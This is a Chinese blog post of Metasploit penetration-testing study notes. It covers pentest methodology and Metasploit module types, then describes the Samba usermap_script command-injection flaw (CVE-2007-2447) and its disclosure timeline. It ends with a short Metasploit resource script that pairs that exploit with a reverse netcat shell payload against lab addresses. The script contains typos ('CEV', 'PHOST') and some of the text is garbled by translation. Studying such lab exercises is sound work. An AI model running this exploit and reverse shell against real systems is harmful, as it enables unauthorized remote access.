Metasploit渗透测试笔记(一)

小结

  • 渗透测试时一种通过模拟恶意攻击者的技术与方法,挫败目的标系统安全控制措施,取得访问控制权,并发现具备业务影响后果安全隐患的一种安全测试与评估方式。渗透测试具有两种基本类型:黑盒测试与白盒测试,结合两种的称为灰盒测试。
  • 目前业界流行的渗透测试方法学有OSSTMM、NIST SP800-42、OWASP TOP 10、WASC-TC、PTES等。
  • 渗透测试主要包括前期交互、情报搜集、威胁建模、漏洞分析、渗透攻击、后渗透攻击和报告7个阶段。
  • 渗透测试流程中最核心和最基本的内容是找出目标系统中存在的安全漏洞,并实施渗透攻击。
  • Metasploit框架中最重要的是辅助模块、渗透攻击模块、后渗透攻击模块、攻击载荷模块、空指令模块和编码器模块这六类模块组件,提供了多种使用接口和一系列的功能程序,支持与大量第三方安全工具进行集合应用。
  • Metasploit最方便的使用平台是Back Track,功能最强大的使用接口是MSF终端。

实践作业

  1. usermap_script是Samba协议的一个漏洞,ID为CEV-2007-2447,属于远程命令注入漏洞,主要影响Samba的3.020到3.0.25rc3版本。
    这个bug最初是针对匿名电话进行报告的到SamrChangePassword()MS-RPC功能组合中与“用户名映射脚本”smb.conf选项(不是默认启用)。经过Samba开发人员的进一步调查,结果如下确定问题更广泛和影响远程打印机和文件共享管理。根原因是传递通过MS-RPC提供的未经过滤的用户输入在调用定义的外部脚本时调用/ bin / sh。
    在smb.conf中,与“用户名映射脚本”不同,漏洞,远程文件和打印机管理脚本需要经过认证的用户会话。

更深入资料见下面的info
在这里插入图片描述
漏洞生命周期

  • 2007年5月7日:漏洞匿名披露到security@samba.org电子邮件列表中。
  • 2007年5月7日:Samba的开发人员Gerald Carter开始响应这个漏洞。
  • 2007年5月9日:Samba的开发者Jeremy Allison发布了补丁,用于iDefense测试。
  • 2007年5月10日:向vendor-sec邮件列表发布通知。
  • 2007年5月14日:公开漏洞信息。

在这里插入图片描述
3.

#usermap.rc
use exploit/multi/samba/usermap_script
set payload cmd/unix/reverse_netcat
set PHOST 192.168.1.254
set LHOST 192.168.1.210

在这里插入图片描述

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值